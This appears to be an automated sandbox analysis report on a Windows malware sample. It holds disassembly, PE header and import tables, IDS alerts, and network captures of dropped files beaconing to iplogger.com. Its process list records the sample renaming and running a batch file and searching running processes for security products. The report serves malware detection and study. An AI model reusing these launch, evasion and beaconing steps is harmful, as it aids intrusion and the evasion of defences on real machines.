                                                call dword ptr [004082C0h]
                                                push 00000008h
                                                mov dword ptr [00472EB8h], eax
                                                call 00007FD5E4CE912Bh
                                                push ebp
                                                push 000002B4h
                                                mov dword ptr [00472DD0h], eax
                                                lea eax, dword ptr [esp+38h]
                                                push eax
                                                push ebp
                                                push 00409264h
                                                call dword ptr [00408184h]
                                                push 0040924Ch
                                                push 0046ADC0h
                                                call 00007FD5E4CE8E0Dh
                                                call dword ptr [004080B0h]
                                                push eax
                                                mov edi, 004C30A0h
                                                push edi
                                                call 00007FD5E4CE8DFBh
                                                push ebp
                                                call dword ptr [00408134h]
                                                cmp word ptr [004C30A0h], 0022h
                                                mov dword ptr [00472DD8h], eax
                                                mov eax, edi
                                                jne 00007FD5E4CE66FAh
                                                push 00000022h
                                                pop esi
                                                mov eax, 004C30A2h
                                                push esi
                                                push eax
                                                call 00007FD5E4CE8AD1h
                                                push eax
                                                call dword ptr [00408260h]
                                                mov esi, eax
                                                mov dword ptr [esp+1Ch], esi
                                                jmp 00007FD5E4CE6783h
                                                push 00000020h
                                                pop ebx
                                                cmp ax, bx
                                                jne 00007FD5E4CE66FAh
                                                add esi, 02h
                                                cmp word ptr [esi], bx
                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ C ] VS2010 SP1 build 40219
                                                • [RES] VS2010 SP1 build 40219
                                                • [LNK] VS2010 SP1 build 40219
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x85a8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x106bda0x28b0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xf40000x85a80x86009dff8efb6cb5e3124b64b6bb0f444b58False0.8464902052238806data7.386337967469148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xfd0000xf320x1000d5ec3cf97c0668f4bbd50420ccf8fbc1False1.002685546875data7.948997141079556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xf42500x442dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9940411390591876
                                                RT_ICON0xf86800x182ePNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012924071082392
                                                RT_ICON0xf9eb00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.22814207650273224
                                                RT_ICON0xfafd80xbb9PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036654448517162
                                                RT_ICON0xfbb980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.24822695035460993
                                                RT_DIALOG0xfc0000x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0xfc1000x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0xfc2200x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0xfc2800x4cdataEnglishUnited States0.8026315789473685
                                                RT_MANIFEST0xfc2d00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                DLLImport
                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-13T02:07:30.303666+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731104.21.76.57443TCP
                                                2024-10-13T02:07:46.381126+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737104.21.76.57443TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2024 02:07:29.648101091 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:29.648133039 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:29.648202896 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:29.660604954 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:29.660621881 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.140626907 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.140702963 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.197880030 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.197925091 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.198849916 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.198920965 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.203118086 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.243417978 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.303582907 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.303689003 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.303752899 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.303765059 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.303893089 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.303893089 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.303972006 CEST44349731104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:30.304053068 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:30.304137945 CEST49731443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:45.757145882 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:45.757194042 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:45.757445097 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:45.768753052 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:45.768774986 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.248487949 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.248603106 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.254734993 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.254743099 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.255134106 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.255620956 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.258742094 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.299401045 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381160975 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381279945 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381287098 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.381303072 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381414890 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381445885 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.381445885 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.381455898 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381613970 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.381824017 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.382086992 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.402276039 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.402311087 CEST44349737104.21.76.57192.168.2.4
                                                Oct 13, 2024 02:07:46.402343988 CEST49737443192.168.2.4104.21.76.57
                                                Oct 13, 2024 02:07:46.402900934 CEST49737443192.168.2.4104.21.76.57
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2024 02:07:29.633657932 CEST5837153192.168.2.41.1.1.1
                                                Oct 13, 2024 02:07:29.642452002 CEST53583711.1.1.1192.168.2.4
                                                Oct 13, 2024 02:07:30.310071945 CEST5967353192.168.2.41.1.1.1
                                                Oct 13, 2024 02:07:30.328972101 CEST53596731.1.1.1192.168.2.4
                                                Oct 13, 2024 02:07:46.409046888 CEST6295453192.168.2.41.1.1.1
                                                Oct 13, 2024 02:07:46.423938990 CEST53629541.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 13, 2024 02:07:29.633657932 CEST192.168.2.41.1.1.10x2b2dStandard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                Oct 13, 2024 02:07:30.310071945 CEST192.168.2.41.1.1.10xc2b9Standard query (0)SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPyA (IP address)IN (0x0001)false
                                                Oct 13, 2024 02:07:46.409046888 CEST192.168.2.41.1.1.10xecb5Standard query (0)SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPyA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 13, 2024 02:07:29.642452002 CEST1.1.1.1192.168.2.40x2b2dNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                                Oct 13, 2024 02:07:29.642452002 CEST1.1.1.1192.168.2.40x2b2dNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                                Oct 13, 2024 02:07:30.328972101 CEST1.1.1.1192.168.2.40xc2b9Name error (3)SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPynonenoneA (IP address)IN (0x0001)false
                                                Oct 13, 2024 02:07:46.423938990 CEST1.1.1.1192.168.2.40xecb5Name error (3)SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPynonenoneA (IP address)IN (0x0001)false
                                                • iplogger.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449731104.21.76.57443180C:\Users\user\AppData\Local\Temp\103495\Powder.pif
                                                TimestampBytes transferredDirectionData
                                                2024-10-13 00:07:30 UTC65OUTGET /15RZZ4 HTTP/1.1
                                                User-Agent: Cutting
                                                Host: iplogger.com
                                                2024-10-13 00:07:30 UTC690INHTTP/1.1 403 Forbidden
                                                Date: Sun, 13 Oct 2024 00:07:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: same-origin
                                                Cache-Control: max-age=15
                                                Expires: Sun, 13 Oct 2024 00:07:45 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBJvXw6fUbGRbS6RhK%2BGglPGzigQ8JyjV5ntZrCNYPilv4t%2Bg9XoXSqGoRUPjt%2FvFa12kdE6KCZ2qc23Cv6fj1N6EHxcxAdUxPNTrxcgctB2VZpV9yNWlFJp8g7wo2s%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                Server: cloudflare
                                                CF-RAY: 8d1b16fe1a345e6e-EWR
                                                2024-10-13 00:07:30 UTC679INData Raw: 31 31 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 11a1<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-10-13 00:07:30 UTC1369INData Raw: 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69
                                                Data Ascii: tyles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navi


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449737104.21.76.574431908C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr
                                                TimestampBytes transferredDirectionData
                                                2024-10-13 00:07:46 UTC65OUTGET /15RZZ4 HTTP/1.1
                                                User-Agent: Cutting
                                                Host: iplogger.com
                                                2024-10-13 00:07:46 UTC690INHTTP/1.1 403 Forbidden
                                                Date: Sun, 13 Oct 2024 00:07:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: same-origin
                                                Cache-Control: max-age=15
                                                Expires: Sun, 13 Oct 2024 00:08:01 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUrKGuZsfbYGpfMv7w87P%2FU%2FWzTCe9VK5vZUxav4Fq8km2kSEIxcqEg6xpwukUByhH2upXUjS3mSd6vZP%2F3TdcVGBnYw0NEY9Hv2CUhgQDSfhXPCwQ39bhwGAJEb5I%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                Server: cloudflare
                                                CF-RAY: 8d1b176299e4c323-EWR
                                                2024-10-13 00:07:46 UTC679INData Raw: 31 31 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 11a1<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-10-13 00:07:46 UTC1369INData Raw: 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69
                                                Data Ascii: tyles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navi
                                                2024-10-13 00:07:46 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c
                                                Data Ascii: div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itsel
                                                2024-10-13 00:07:46 UTC1104INData Raw: 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
                                                Data Ascii: hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator s
                                                2024-10-13 00:07:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:20:07:22
                                                Start date:12/10/2024
                                                Path:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\cW5i0RdQ4L.exe"
                                                Imagebase:0x400000
                                                File size:1'086'602 bytes
                                                MD5 hash:C065BA22909FC8DBDED4EA0EEBB24AD5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:20:07:23
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:20:07:23
                                                Start date:12/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:20:07:25
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                Wow64 process (32bit):true
                                                Commandline:tasklist
                                                Imagebase:0x990000
                                                File size:79'360 bytes
                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:20:07:25
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr /I "wrsa opssvc"
                                                Imagebase:0x150000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
